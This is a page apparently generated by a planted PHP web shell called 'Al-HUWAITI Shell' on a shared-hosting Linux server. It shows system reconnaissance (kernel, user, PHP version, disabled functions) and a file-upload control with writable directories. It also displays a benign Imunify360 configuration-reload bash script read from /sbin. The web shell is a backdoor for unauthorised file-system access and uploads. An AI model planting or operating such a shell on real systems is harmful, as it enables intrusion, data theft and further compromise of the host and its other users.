Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : pigugusurya ( 1113)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //sbin/imunify-auditd-log-reader-cfg-reload
#!/usr/bin/bash

# This script copies is responsible for install auditd-log-reader configuration file
# received from imunify360 agent.
# It is assumed that imunify360 agent will trigger this script each time new configuration file is deployed.

SRC=/var/imunify360/files/auditd-log-reader/v1/config.yaml
DEST=/etc/imunify-auditd-log-reader/config.yaml

mkdir -p dir $(dirname $DEST)
cp -f $SRC $DEST

systemctl restart imunify-auditd-log-reader

Al-HUWAITI Shell